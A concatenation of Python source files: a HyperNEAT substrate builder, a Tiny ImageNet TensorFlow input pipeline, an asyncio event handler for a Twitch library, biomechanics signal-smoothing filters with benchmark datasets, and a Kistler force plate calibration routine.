for mapping in out_hid_mapping_tuples:
source_sheet_id = mapping[0]
node_connections += query_cppn(cppn,oc,output_coordinates,(substrate[source_sheet_id],source_sheet_id), hidden_node_ids[idx], id_dict)
idx += len(substrate[source_sheet_id])
if node_connections:
node_evals.append((output_node_ids[out_node_counter], output_activation, sum, node_connections))
hidden_idx = idx
idx = 0
out_node_counter += 1
# Query CPPN for mapping between hidden layers (from top to bottom)
hid_node_counter = 0
next_idx = idx = hidden_idx
# For each hidden layer in the substrate, going from top to bottom
for layer_idx in range((len(layers)-1), 2, -1):
# For each sheet in the current layer, i
for sheet_idx in range(len(layers[layer_idx])):
# Assign target sheet id
target_sheet_id = layers[layer_idx][sheet_idx]
hid_hid_mapping_tuple = [mapping for mapping in mapping_tuples if (mapping[1] == target_sheet_id)]
# For each coordinate in target sheet
for hc in substrate[target_sheet_id]:
# Adding Biases from Hidden to Hidden
node_connections = query_cppn(cppn,hc,(substrate[target_sheet_id],target_sheet_id),bias_coordinates,bias_node_ids[0], id_dict)
for mapping in hid_hid_mapping_tuple:
source_sheet_id = mapping[0]
node_connections += query_cppn(cppn,hc,(substrate[target_sheet_id],target_sheet_id),(substrate[source_sheet_id], source_sheet_id),hidden_node_ids[idx], id_dict)
idx += len(substrate[source_sheet_id])
if node_connections:
node_evals.append((hidden_node_ids[hid_node_counter],hidden_activation,sum, node_connections))
hid_node_counter += 1
next_idx = idx
idx = hidden_idx
idx = next_idx
hidden_idx = next_idx
# Query CPPN for mapping between bottom hidden layer to input layer
idx = 0
for i in range(len(layers[2])):
# Assign target
target_sheet_id = layers[2][i]
# For each coordinate in target sheet
for hc in substrate[target_sheet_id]:
node_connections = query_cppn(cppn, hc, (substrate[target_sheet_id],target_sheet_id), input_coordinates, input_node_ids[idx], id_dict)
# Adding Biases from Hidden to Input
node_connections += query_cppn(cppn,hc,(substrate[target_sheet_id],target_sheet_id),bias_coordinates,bias_node_ids[0], id_dict)
if node_connections:
node_evals.append((hidden_node_ids[hid_node_counter],hidden_activation, sum,node_connections))
hid_node_counter += 1
# No hidden layers
else:
# Output Input Layer
idx, counter = 0, 0
for i in range(len(layers[0])):
# Assign target
target_sheet_id = layers[0][i]
# For each coordinate in target sheet
for oc in output_coordinates[0]:
node_connections = query_cppn(cppn,oc,output_coordinates,input_coordinates,input_node_ids[idx], id_dict)
node_connections += query_cppn(cppn,oc,output_coordinates,bias_coordinates,bias_node_ids[idx], id_dict)
if node_connections:
node_evals.append((output_node_ids[counter],output_activation,sum,node_connections))
counter += 1
return FeedForwardSubstrate(input_node_ids, bias_node_ids, output_node_ids, node_evals)
def query_cppn(cppn, source_coordinate, source_layer, target_layer, node_idx, id_dict, max_weight=5.0):
'''
Given a single node's coordinates and a layer of nodes, query the CPPN for potential weights
for all possible connections between the layer and the single node.
Based on PurePLES. Copyright (c) 2017 <NAME> & <NAME>.
cppn -- CPPN
source_coordinate -- coordinate of single node to be connected to a set of nodes
source_layer -- layer of nodes in which source_coordinate resides
target_layer -- layer of nodes to which source_coordinate will be connected
node_idx -- node index to begin on when traversing target_layer
id_dict -- dictionary of CPPN output node ids and their respective mapping tuples
'''
node_connections = []
target_coordinates = target_layer[0]
target_layer_id = target_layer[1]
source_layer_id = source_layer[1]
mapping_tuple = (target_layer_id,source_layer_id)
cppnon_id = id_dict[mapping_tuple]
for target_coordinate in target_coordinates:
i = [target_coordinate[0], target_coordinate[1], source_coordinate[0], source_coordinate[1]]
w = cppn.activate(i)[cppnon_id]
if abs(w) < max_weight:
node_connections.append((node_idx, w*max_weight))
elif abs(w) > max_weight:
node_connections.append((node_idx, max_weight))
else:
node_connections.append((node_idx, 0.0))
node_idx += 1
return node_connections
def gather_layers(substrate):
'''
Takes a dictionary representation of a substrate and returns
a list of the layers and the sheets within those layers.
substrate -- dictionary representation of a substrate
'''
layers = {}
for i in range(len(substrate)):
layers[i] = []
for key in substrate.keys():
if key[0] == i and key not in layers[i]:
layers[i].append(key)
if layers[i] == []:
del layers[i]
return layers
``` |
{
"source": "0three/CAAD-2018-Kunlin",
"score": 2
} |
#### File: CAAD-2018-Kunlin/datasets/tiny_imagenet_input.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl import flags
import tensorflow as tf
FLAGS = flags.FLAGS
flags.DEFINE_string('tiny_imagenet_data_dir', None,
'Directory with Tiny Imagenet dataset in TFRecord format.')
def tiny_imagenet_parser(value, image_size, is_training):
"""Parses tiny imagenet example.
Args:
value: encoded example.
image_size: size of the image.
is_training: if True then do training preprocessing (which includes
random cropping), otherwise do eval preprocessing.
Returns:
image: tensor with the image.
label: true label of the image.
"""
keys_to_features = {
'image/encoded': tf.FixedLenFeature((), tf.string, ''),
'label/tiny_imagenet': tf.FixedLenFeature([], tf.int64, -1),
}
parsed = tf.parse_single_example(value, keys_to_features)
image_buffer = tf.reshape(parsed['image/encoded'], shape=[])
image = tf.image.decode_image(image_buffer, channels=3)
image = tf.image.convert_image_dtype(
image, dtype=tf.float32)
# Crop image
if is_training:
bbox_begin, bbox_size, _ = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=tf.constant([0.0, 0.0, 1.0, 1.0],
dtype=tf.float32,
shape=[1, 1, 4]),
min_object_covered=0.5,
aspect_ratio_range=[0.75, 1.33],
area_range=[0.5, 1.0],
max_attempts=20,
use_image_if_no_bounding_boxes=True)
image = tf.slice(image, bbox_begin, bbox_size)
# resize image
image = tf.image.resize_bicubic([image], [image_size, image_size])[0]
# Rescale image to [-1, 1] range.
image = tf.multiply(tf.subtract(image, 0.5), 2.0)
image = tf.reshape(image, [image_size, image_size, 3])
# Labels are in [0, 199] range
label = tf.cast(
tf.reshape(parsed['label/tiny_imagenet'], shape=[]), dtype=tf.int32)
return image, label
def tiny_imagenet_input(split, batch_size, image_size, is_training):
"""Returns Tiny Imagenet Dataset.
Args:
split: name of the split, "train" or "validation".
batch_size: size of the minibatch.
image_size: size of the one side of the image. Output images will be
resized to square shape image_size*image_size.
is_training: if True then training preprocessing is done, otherwise eval
preprocessing is done.instance of tf.data.Dataset with the dataset.
Raises:
ValueError: if name of the split is incorrect.
Returns:
Instance of tf.data.Dataset with the dataset.
"""
if split.lower().startswith('train'):
filepath = os.path.join(FLAGS.tiny_imagenet_data_dir, 'train.tfrecord')
elif split.lower().startswith('validation'):
filepath = os.path.join(FLAGS.tiny_imagenet_data_dir, 'validation.tfrecord')
else:
raise ValueError('Invalid split: %s' % split)
dataset = tf.data.TFRecordDataset(filepath, buffer_size=8*1024*1024)
if is_training:
dataset = dataset.shuffle(10000)
dataset = dataset.repeat()
dataset = dataset.apply(
tf.contrib.data.map_and_batch(
lambda value: tiny_imagenet_parser(value, image_size, is_training),
batch_size=batch_size,
num_parallel_batches=4,
drop_remainder=True))
def set_shapes(images, labels):
"""Statically set the batch_size dimension."""
images.set_shape(images.get_shape().merge_with(
tf.TensorShape([batch_size, None, None, None])))
labels.set_shape(labels.get_shape().merge_with(
tf.TensorShape([batch_size])))
return images, labels
# Assign static batch size dimension
dataset = dataset.map(set_shapes)
dataset = dataset.prefetch(tf.contrib.data.AUTOTUNE)
return dataset
def num_examples_per_epoch(split):
"""Returns the number of examples in the data set.
Args:
split: name of the split, "train" or "validation".
Raises:
ValueError: if split name is incorrect.
Returns:
Number of example in the split.
"""
if split.lower().startswith('train'):
return 100000
elif split.lower().startswith('validation'):
return 10000
else:
raise ValueError('Invalid split: %s' % split)
``` |
{
"source": "0tika/twitch.py",
"score": 2
} |
#### File: twitch.py/twitch/event_handler.py
```python
import logging
import asyncio
from functools import partial
from .events import Event
log = logging.getLogger(__name__)
class _EventTask(asyncio.Task):
def __init__(self, original_coro, event_name, coro, *, loop):
super().__init__(coro, loop=loop)
self.__event_name = event_name
self.__original_coro = original_coro
def __repr__(self):
info = [
('state', self._state.lower()),
('event', self.__event_name),
('coro', repr(self.__original_coro)),
]
if self._exception is not None:
info.append(('exception', repr(self._exception)))
task = ' '.join(f'{t}={t}' for t in info)
return f'<EventTask {task}>'
class EventHandler:
def __init__(self, loop):
self.loop = loop
self._listeners = {}
self._handlers = {Event.CONNECTED: self._handle_connected}
self._connected = asyncio.Event(loop=self.loop)
def __getitem__(self, event):
try:
listener = self._listeners[event]
except KeyError:
listener = []
self._listeners[event] = listener
return listener
def register(self, event, coro):
real_coro = coro.func if isinstance(coro, partial) else coro
coro_name = real_coro.__name__
if not asyncio.iscoroutinefunction(real_coro):
raise TypeError(
f'{coro_name} '
f'must be a coroutine function to be registered')
event = f'on_{event}' if not event.startswith('on_') else event
def get_name(coro):
return coro.func.__name__ if isinstance(coro, partial) else \
coro.__name__
coros = getattr(self, event, [])
# ensure the same on_message coro can't be registered twice
if coro_name not in [get_name(c) for c in coros]:
coros.append(coro)
setattr(self, event, coros)
def emit(self, event, *args, **kwargs):
handler = self._handlers.get(event)
if handler:
log.info(f'invoking custom handler for {event}')
handler()
log.info(f'emitting event {event}')
method = f'on_{event}'
listeners = self._listeners.get(event)
if listeners:
removed = []
for i, (future, condition) in enumerate(listeners):
if future.cancelled():
removed.append(i)
continue
try:
result = condition(*args)
except Exception as exc:
future.set_exception(exc)
removed.append(i)
else:
if result:
if len(args) == 0:
future.set_result(None)
elif len(args) == 1:
future.set_result(args[0])
else:
future.set_result(args)
removed.append(i)
if len(removed) == len(listeners):
self._listeners.pop(event)
else:
for idx in reversed(removed):
del listeners[idx]
try:
coros = getattr(self, method)
self._schedule_event(coros, method, *args, **kwargs)
except AttributeError:
pass
def _schedule_event(self, coros, event_name, *args, **kwargs):
# schedule the tasks
for wrapped_coro, coro in [
(_run_event(coro, event_name, *args, **kwargs), coro)
for coro in coros]:
_EventTask(original_coro=coro, event_name=event_name,
coro=wrapped_coro, loop=self.loop)
@property
def connected(self):
return self._connected
def clear_connected(self):
self._connected.clear()
def _handle_connected(self):
self._connected.set()
async def _on_run_error(method, err):
log.info(f'ignoring exception in {method}: {err}')
async def _run_event(coro, event_name, *args, **kwargs):
try:
await coro(*args, **kwargs)
except asyncio.CancelledError:
pass
except Exception as e:
try:
await _on_run_error(event_name, str(e))
except asyncio.CancelledError:
pass
``` |
{
"source": "0todd0000/autofilter1d",
"score": 3
} |
#### File: autofilter1d/smooth1d/datasets.py
```python
from math import pi,sin
import numpy as np
dataset_names = ['Challis1999a',
'Challis1999b',
'Challis1999c',
'Challis1999d',
'Challis1999e',
'Null',
'Vaughan1982']
class _Dataset(object):
'''
Abstract template class for all datasets
'''
author = None #Author's name
name = None #Dataset name
year = None #Year of publication / dissemination
y = None #The 1D datum continuum
t = None #Time vector
dt = None #Duration between time nodes (s)
hz = None #Sample frequency (Hz)
def get_data(self):
'''
Get time vector and 1D datum continuum
Arguments:
(None)
Returns:
*t* : time vector (1D NumPy array)
*y* : 1D datum continuum (1D NumPy array)
'''
return self.t, self.y
def get_name(self):
'''
Get dataset name.
Arguments:
(None)
Returns:
*s* : dataset name (str)
'''
s = self.author
if self.year is not None:
s += ' (%s)' %self.year
if self.name is not None:
s += ' %s' %self.name
return s
def get_namep(self):
s = self.author
if self.year is not None:
s += ' %s' %self.year
if self.name is not None:
s += ' %s' %self.name
return s
class Null(_Dataset):
'''
A null 1D datum; y(q)=0 for all q
'''
def __init__(self):
self.author = 'Null'
self.name = None
self.year = None
self.t = np.linspace(0, 1, 101)
self.y = np.zeros(101)
self.dt = 0.01
self.hz = 1 / self.dt
class Vaughan1982(_Dataset):
'''
Data available in Vaughan (1982, p.379, Table 1,)
Vaughan CL (1982). Smoothing and differentiation of displacement-time data: an application of splines and digital filtering. International Journal of Bio-Medical Computing 13, 375–386.
'''
def __init__(self):
self.author = 'Vaughan'
self.name = None
self.year = 1982
self.y = np.array([1.770,1.757,1.748,1.740,1.726, 1.715,1.698,1.683,1.667,1.651,1.632,1.612,1.593,1.572,1.551,1.530,1.507,1.483,1.445,1.428,1.401,1.371,1.343,1.311,1.279,1.245,1.212,1.175,1.143,1.105,1.063,1.029,0.991,0.953,0.910,0.869,0.823,0.779,0.732,0.691,0.644,0.595,0.548,0.501,0.447,0.395,0.350,0.294,0.243,0.185])
self.dt = 0.00985
self.hz = 1 / self.dt
self.t = self.dt * np.arange( self.y.size )
class _Challis1999(_Dataset):
CONST_W0 = 2 * pi
CONST_A = np.array([16, 12, 6.3, 0.5, 1.2, 0.6, 0.3, 0.2, 0.1, 0.09, 0.04, 0.06, 0.01])
CONST_PHI = np.array([0.99, 0.23, -2.97, 0.0, -3.13, -0.84, 2.14, 0.58, 1.15, 0.17, -1.13, 0.76, -1.21])
author = 'Challis'
year = 1999
def __init__(self):
self.dt = self.t[1] - self.t[0]
self.hz = 1 / self.dt
def get_namep(self):
return '%s %s, Dataset %s' %(self.author, self.year, self.name)
class Challis1999A(_Challis1999):
'''
Dataset A from:
<NAME> (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317.
'''
def __init__(self):
w0,a,phi = self.CONST_W0, self.CONST_A, self.CONST_PHI
self.name = 'A'
self.t = np.linspace(0, 1, 91)
self.y = np.array([(a * np.sin( np.arange(1,14) * w0 * tt + phi)).sum() for tt in self.t])
super().__init__()
class Challis1999B(_Challis1999):
'''
Dataset B from:
<NAME> (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317.
'''
def __init__(self):
self.name = 'B'
self.t = np.linspace(0, 1, 91)
self.y = self._get_y()
super().__init__()
def _get_y(self):
w0,a,phi = self.CONST_W0, self.CONST_A, self.CONST_PHI
t = self.t
n,k,dt = t.size, 40.0, t[1] - t[0]
p = (dt * (n-1)) - (0.5*dt)
f = []
for tt in t:
ff = k * (tt- 0.5*p)**2
for i,(aa,pphi) in enumerate( zip(a,phi) ):
ff += (aa) * sin( (i+1) * w0 * tt + pphi)
f.append(ff)
return np.array(f)
class Challis1999C(_Challis1999):
'''
Dataset C from:
<NAME>H (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317.
'''
def __init__(self):
self.name = 'C'
self.t = np.linspace(0, 1, 91)
self.y = self._get_y()
super().__init__()
def _get_y(self):
t = self.t
f = np.zeros(t.size)
i0 = t <= 0.85
i1 = t > 0.85
f[i0] = (-55.1 * t[i0]) + (427 * t[i0]**3) + (-342 * t[i0]**4)
f[i1] = 579.97 - (304.32 * t[i1]) + (-241.77 * t[i1]**-1)
return np.array(f)
class Challis1999D(_Challis1999):
'''
Dataset D from:
<NAME>H (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317.
'''
def __init__(self):
self.name = 'D'
self.t = np.linspace(0, 5, 200)
self.y = self._get_y()
super().__init__()
def _get_y(self):
t = self.t
f = np.zeros(t.size)
i0 = t <= 4.
i1 = t > 4.0
f[i0] = pi**-2 * np.sin( pi * t[i0] )
f[i1] = pi**-1 * ( t[i1] - 4 )
return f
class Challis1999E(_Challis1999):
'''
Dataset E from:
<NAME> (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317.
'''
def __init__(self):
self.name = 'E'
self.t = np.linspace(0, 1, 128)
self.y = self._get_y()
super().__init__()
def _get_y(self):
t = self.t
B = 10000
f = B * t**2 * (t-0.1) * (t-0.2) * (t-0.5) * (t-0.75) * (t-0.95) * (t-1)**2 + t**2
return f
dataset_classes = [Null, Vaughan1982, Challis1999A, Challis1999B, Challis1999C, Challis1999D, Challis1999E]
def load(datasetname):
assert isinstance(datasetname, str) and (datasetname in dataset_names), 'datasetname must be one of %s' %dataset_names
if datasetname=='Null':
dataset = Null()
if datasetname=='Challis1999a':
dataset = Challis1999A()
elif datasetname=='Challis1999b':
dataset = Challis1999B()
elif datasetname=='Challis1999c':
dataset = Challis1999C()
elif datasetname=='Challis1999d':
dataset = Challis1999D()
elif datasetname=='Challis1999e':
dataset = Challis1999E()
elif datasetname=='Vaughan1982':
dataset = Vaughan1982()
else:
raise( ValueError('Unknown dataset name: %s' %datasetname) )
t,y = dataset.get_data()
return t,y
```
#### File: autofilter1d/smooth1d/smooth.py
```python
import os
import ctypes
from math import sqrt,log
import numpy as np
import scipy.signal
from statsmodels.robust import mad
import pywt
from . import util
round_up_to_odd = util.round_up_to_odd
paddon = util.paddon
paddoff = util.paddoff
def butter_lowpass(y, dt, cutoff, order=2):
'''
Lowpass Butterworth filter
INPUTS:
*y* : 1D measurement ( (Q,) array )
*dt* : inter-node duration = (1 / sampling frequency)
*cutoff* : cut-off frequency (Hz) (int or float)
*order* : filter order (int)
OUTPUTS:
*ys* : smoothed 1D measurement ( (Q,) array )
'''
cutoff = cutoff / ( 2**0.5 - 1 ) ** (0.5/order)
b,a = scipy.signal.butter(order, 2*cutoff*dt, btype='lowpass')
fdata = scipy.signal.filtfilt( b, a, y, padtype='odd')
return fdata
def embed(time, y, cutoffs=None, order=2):
'''
Embed a measurement in an abstract 2D time-cutoff space
INPUTS:
*time* : 1D time vector ( (Q,) array )
*y* : 1D measurement ( (Q,) array )
*cutoffs* : cut-off frequencies (Hz) (list of int or float)
*order* : filter order (int)
OUTPUTS:
*Ys* : smoothed, embedded 1D measurement ( (J,Q) array )
'''
dt = time[1] - time[0]
cutoffs = cutoffs if cutoffs is not None else np.linspace(5, 10, 50)
ncut = cutoffs.size
if y.ndim == 1:
ye = np.array([butter_lowpass(y, dt, xx, order=order) for xx in cutoffs])
elif y.ndim == 2:
J,Q = y.shape
ye = np.zeros( (J,ncut,Q) )
for i,xx in enumerate(cutoffs):
ye[:,i,:] = butter_lowpass(y, dt, xx, order=order)
return ye
def _filtmat(dt, cutoff, order, data):
'''
(Code translated from a MATLAB implementation written by <NAME>;
MATLAB code received by email without license)
'''
return butter_lowpass(data, dt, cutoff, order)
def _autocorr(nsignal, dt, order):
'''
(Code translated from a MATLAB implementation written by <NAME>;
MATLAB code received by email without license)
'''
colow = 0.5
coup = 0.25 / dt
for i,co in enumerate(np.arange(colow, coup+0.1, 0.1)):
ssignal = _filtmat(dt, co, order, nsignal)
resid = ssignal - nsignal
acorr = np.correlate(resid, resid, mode='full')
acorr /= acorr.max()
f = np.sum( np.abs(acorr) )
if i==0:
fmin = f #objective function
coopt = co #(currently) optimum cutoff frequency
s = ssignal #(currently) optimally smoothed signal
if f < fmin:
fmin = f
coopt = co
s = ssignal
return s,coopt
def autocorr(y, order=2, time=None):
'''
Autocorrelation filtering method.
(Code translated from a MATLAB implementation written by <NAME>;
MATLAB code received by email from author, without license)
Reference:
<NAME> (1999). A procedure for the automatic determination of filter
cutoff frequency for the processing of biomechanical data. Journal of
Applied Biomechanics 15, 303–317.
'''
dt = 1 if time is None else time[1] - time[0]
if y.ndim == 1:
ys,cutoff = _autocorr(y, dt, order)
else:
ys,xopt = [],[]
for yy in y:
s,c = _autocorr(yy, dt, order)
ys.append(s)
xopt.append(c)
ys,cutoff = np.array(ys), np.array(xopt)
return ys
def _gcvspl(x, y, m=2, library='gcvspl.so'):
'''
Generalized cross-validatory spline filtering
(Using this function requires a compiled dynamic link library.)
(This code is distributed with a library called "gcvspl.so" which
was compiled for Mac using the source code from Twisk (1994), link below.)
https://isbweb.org/resources/software-resources/137-signal-processing-software/497-gcvspl-in-c-d-twisk
Reference:
<NAME>, <NAME> (1979). Smoothing noisy data with splines functions. Numerische Mathematik 31, 377–403.
'''
### load DLL:
fnameSO = os.path.join( os.path.dirname(__file__), library)
L = ctypes.CDLL(fnameSO)
### assemble required variable types
c_int = ctypes.c_int
c_double = ctypes.c_double
p_double = np.ctypeslib.ndpointer(ctypes.c_double)
p_int = np.ctypeslib.ndpointer(ctypes.c_int32)
### specify argument types
L.gcvspl.argtypes = [p_double, p_double, p_double, c_int, c_int, p_double, c_double, p_double, c_int]
L.splder.argtypes = [c_int, c_int, c_int, c_double, p_double, p_double, p_int, p_double]
L.splder.restype = c_double
K = 1
NN = x.size
MM = 10
MM2 = 2*MM
NWK = NN+6*(NN*MM+1)
c = np.zeros(NN)
wk = np.zeros(NWK)
q = np.zeros(MM+1)
v = np.zeros(MM2)
q0 = np.zeros(NN)
q1 = np.zeros(NN)
q2 = np.zeros(NN)
wy = 1.0
wx = np.ones(NN)
n = NN
var = -1.0
ier = 0
L.gcvspl(x, y, wx, m, n, c, var, wk, ier)
Q = NN
ider = 0 #derivative order
t = x.copy()
l = 2 * np.ones(Q, dtype=np.int32)
q = np.zeros(2*m)
a = np.array([L.splder(ider, m, n, tt, x, c, l, q) for tt in t])
return a
def gcvspl(x, y, m=3):
'''
Generalized cross-validatory spline filtering
(Using this function requires a compiled dynamic link library.)
(This code is distributed with a library called "gcvspl.so" which
was compiled for Mac using the source code from Twisk (1994), link below.)
https://isbweb.org/resources/software-resources/137-signal-processing-software/497-gcvspl-in-c-d-twisk
Reference:
<NAME>, <NAME> (1979). Smoothing noisy data with splines functions. Numerische Mathematik 31, 377–403.
INPUTS:
*x* : 1D time vector ( (Q,) array )
*y* : 1D measurement ( (Q,) array )
*m* : half-order (int); spline degree = (2*m - 1)
OUTPUTS:
*ys* : smoothed 1D measurement ( (J,Q) array )
'''
if y.ndim==2:
ys = np.array([_gcvspl(x, yy, m) for yy in y])
else:
ys = _gcvspl(x, y, m)
return ys
def _ssa(x, L=5, ncomponents=2):
'''
Singular Spectrum Analysis smoother
Adapted from the MATLAB code "ssa.m" by <NAME>
The original MATLAB code was downloaded on 2017-11-20 from:
https://www.mathworks.com/matlabcentral/fileexchange/8115-singular-spectrum-analysis-smoother?s_tid=prof_contriblnk
References:
<NAME>., <NAME>., <NAME>., 2001. Analisys of Time Series Structure - SSA and Related Techniques. Chapman & Hall/CR
<NAME>., <NAME>, <NAME>., (2005), Application of singular spectrum analysis to the smoothing of raw kinematic signals. J. Biomech. 38, 1085-1092.
'''
#Step 1: Build trajectory matrix:
N = x.size
L = (N - L) if (L > N/2) else L
K = N - L + 1
X = np.zeros((L, K))
for i in range(K):
X[:L, i] = x[i:L+i]
X = np.matrix( X )
#Step 2: SVD
U,s,v = np.linalg.svd(X)
V = X.T * U
rc = U * V.T
#Step 3: Grouping
I = range(ncomponents)
rca = U[:, I] * V.T[I]
#Step 4: Reconstruction
y = np.zeros(N)
Lp = min(L, K)
Kp = max(L, K)
for k in range(0, Lp-1):
for m in range(k+1):
y[k] += (1.0/(k+1)) * rca[m,k-m]
for k in range(Lp-1, Kp):
for m in range(Lp):
y[k] += (1.0/Lp) * rca[m,k-m]
for k in range(Kp, N):
for m in range(k-Kp+1, N-Kp+1):
y[k] += (1.0/(N-k)) * rca[m,k-m]
return y
def ssa(y, L, ncomponents=2):
'''
Singular Spectrum Analysis smoother
Adapted from the MATLAB code "ssa.m" by <NAME>
The original MATLAB code was downloaded on 2017-11-20 from:
https://www.mathworks.com/matlabcentral/fileexchange/8115-singular-spectrum-analysis-smoother?s_tid=prof_contriblnk
References:
<NAME>., Nekrutkin, V., <NAME>., 2001. Analisys of Time Series Structure - SSA and Related Techniques. Chapman & Hall/CR
<NAME>., <NAME>, <NAME>., (2005), Application of singular spectrum analysis to the smoothing of raw kinematic signals. J. Biomech. 38, 1085-1092.
'''
if y.ndim==2:
ys = np.array([_ssa(yy, L, ncomponents) for yy in y])
else:
ys = _ssa(y, L, ncomponents)
return ys
def _wavelet_single(y):
'''
Wachowiak (2000)
Following code from:
http://jseabold.net/blog/2012/02/23/wavelet-regression-in-python/
'''
yy,nadd = paddon(y)
coefs = pywt.wavedec(yy, 'db8', level=None, mode='per')
sigma = mad( coefs[-1] )
uthresh = sigma * sqrt( 2*log(len(y)) )
denoised = coefs[:]
denoised[1:] = (pywt.threshold(i, value=uthresh, mode='soft') for i in denoised[1:])
ys = pywt.waverec(denoised, 'db8', mode='per')
ys = paddoff(ys, nadd)
return ys
def wavelet(y):
'''
Wachowiak (2000)
Following code from:
http://jseabold.net/blog/2012/02/23/wavelet-regression-in-python/
'''
if y.ndim == 1:
ys = _wavelet_single(y)
else:
ys = np.array([_wavelet_single(yy) for yy in y])
return ys
def wiener(y, window_rel=0.05):
'''
Weiner filter
This is a convenience interface to scipy.signal.wiener
'''
n = y.size if y.ndim==1 else y.shape[1]
window = round_up_to_odd( window_rel * n )
ys = np.array([scipy.signal.wiener(yy, window, None) for yy in y])
return ys
``` |
{
"source": "0todd0000/BMC",
"score": 3
} |
#### File: BMC/functions/kistler_fp_cal.py
```python
from __future__ import division, print_function
import numpy as np
__author__ = '<NAME>, https://github.com/demotu/BMC'
__version__ = 'kistler_fp_cal.py v.1 2014/12/12'
def kistler_fp_cal(data, S_matrix=None, fxfy_range=0, fz_range=0, origin=None,
fp_type=3, show=False, axs=None):
"""Kistler force plate calibration
In order to get proper signals of a Kistler force plate, we have to
calibrate the acquired data according to the factory calibration (i.e.,
transform the readed values in volts of the 8 channels to values in newtons
for fx12, fx34, fy14, fy23, fz1, fz2, fz3, fz4) and then calculate the
resultant forces (Fx, Fy, Fz), resultant moments of force (Mx, My, Mz),
and center of pressure (COPx, COPy) quantities. See [1]_ and [2]_
Parameters
----------
data : array_like [fx12, fx34, fy14, fy23, fz1, fz2, fz3, fz4]
Kistler force plate data (8 columns, in Volts)
S_matrix : array_like
sensitivity matrix for Kistler force plate (8 columns) and at least
one row
fxfy_range : number [0, 1, 2, 3], optional
Fx/Fy amplifier range used in the data acquisition
Fx/Fy [kN]: 0.25, 1.25, 2.5, 5
This is only used if the sensitivity matrix has more than one row
and the first four columns of the corresponding row are selected.
fz_range : number [0, 1, 2, 3], optional
Fz amplifier range used in the data acquisition
Fz [kN]: 1, 5, 10, 20
This is only used if the sensitivity matrix has more than one row
and the last four columns of the corresponding row are selected.
origin : array_like [a, b, az0]
coordinates of the force plate origin (az0 is negative, in meters)
fp_type : number [1, 2, 3, 4]
type of force plate to be used in the COP correction
1: type 9281E11
2: type 9281E and 9281EA (SN: <= 616901)
3: type 9281E and 9281EA (SN: >= 616902)
4: type 9287C, 9287CA
show : bool, optional (default = False)
if True (1), plot data in matplotlib figure.
axs : a matplotlib.axes.Axes instance, optional (default = None).
Returns
-------
grf : numpy array [Fx, Fy, Fz, Mx, My, Mz]
ground reaction force data
cop : numpy array [COPx, COPy]
center of pressure data
References
----------
.. [1] http://isbweb.org/software/movanal/vaughan/kistler.pdf
.. [2] http://nbviewer.ipython.org/github/demotu/BMC/blob/master/notebooks/KistlerForcePlateCalculation.ipynb
"""
if not S_matrix:
# sensitivity matrix for Kistler force plate 9281EA Serial no. 4402018
# calibrated range
# Fx/Fy [kN]: 0.25, 1.25, 2.5, 5
# Fz [kN]: 1, 5, 10, 20
S_matrix = np.array([[38.117, 37.723, 38.062, 38.008, 19.492, 19.445, 19.426, 19.457],
[ 7.623, 7.545, 7.212, 7.602, 3.898, 3.889, 3.885, 3.891],
[ 3.803, 3.761, 3.800, 3.796, 1.951, 1.945, 1.944, 1.948],
[ 1.901, 1.881, 1.900, 1.898, 0.976, 0.973, 0.972, 0.974]])
S_matrix = np.atleast_2d(S_matrix)
S_matrix = np.hstack((S_matrix[fxfy_range, 0:4], S_matrix[fz_range, 4:9]))
if not origin:
# origin for Kistler force plate 9281EA Serial no. 4402018
origin = np.array([0.120, 0.200, -0.048])
a, b, az0 = np.hsplit(np.asarray(origin), 3)
# COP correction coefficients
if fp_type == 1: # Type 9281E11
Px = [2.51997E-15, -2.18826E-10, -2.69254E-07, -4.85912E-11, 4.55731E-6, -4.18892E-2]
Py = [2.83750E-15, -1.00051E-10, -2.05349E-06, -1.16374E-10, 4.71553E-6, 6.89265E-2]
elif fp_type == 2: # Type 9281E and 9281EA (SN: <= 616901)
Px = [1.1604E-14, -8.39091E-10, -1.44293E-6, -2.85927E-10, 2.05575E-5, -0.113525]
Py = [1.27251E-14, -3.13238E-10, -3.33888E-6, -6.49641E-10, 1.53937E-5, 1.12624E-1]
elif fp_type == 3: # Type 9281E and 9281EA (SN: >= 616902)
Px = [7.92063E-15, -5.821E-10, -2.77102E-6, -1.76083E-10, 1.29695E-5, -0.0413979]
Py = [8.82869E-15, -2.48554E-10, -1.76282E-6, -4.22186E-10, 1.2091E-5, 5.16279E-2]
elif fp_type == 4: # Type 9287C, 9287CA
Px = [1.72454E-16, -4.82275E-11, 3.30016E-7, -9.46569E-12, 2.78736E-6, -8.20399E-3]
Py = [2.20428E-16, -1.80864E-11, -7.30249E-7, -3.03080E-11, 2.64974E-6, 5.41166E-2]
else:
Px = []
Py = []
# Calibration
data = 1000*data/S_matrix
fx12, fx34, fy14, fy23, fz1, fz2, fz3, fz4 = np.hsplit(data, 8)
# Medio-lateral force
Fx = fx12 + fx34
# Anterior-posterior force
Fy = fy14 + fy23
# Vertical force
Fz = fz1 + fz2 + fz3 + fz4
# Plate moment about X-axis
Mx = b * (fz1 + fz2 - fz3 - fz4)
# Plate moment about Y-axis
My = a * (-fz1 + fz2 + fz3 - fz4)
# Plate moment about Z-axis
Mz = b * (-fx12 + fx34) + a * (fy14 - fy23)
# Plate moment about top plate surface
Mx = Mx + Fy*az0
# Plate moment about top plate surface
My = My - Fx*az0
# X-Coordinate of force application point (COP)
ax = -My / Fz
# Y-Coordinate of force application point (COP)
ay = Mx / Fz
# Coefficient of Friction x-component
#COFx = Fx / Fz
# Coefficient of Friction y-component
#COFy = Fy / Fz
# COP correction
if Px:
Dax = (Px[0]*ay**4 + Px[1]*ay**2 + Px[2])*ax**3 + (Px[3]*ay**4 + Px[4]*ay**2 + Px[5])*ax
ax = ax - Dax
if Py:
Day = (Py[0]*ax**4 + Py[1]*ax**2 + Py[2])*ay**3 + (Py[3]*ax**4 + Py[4]*ax**2 + Py[5])*ay
ay = ay - Day
# Free moment
Mz = Mz - Fy*ax + Fx*ay
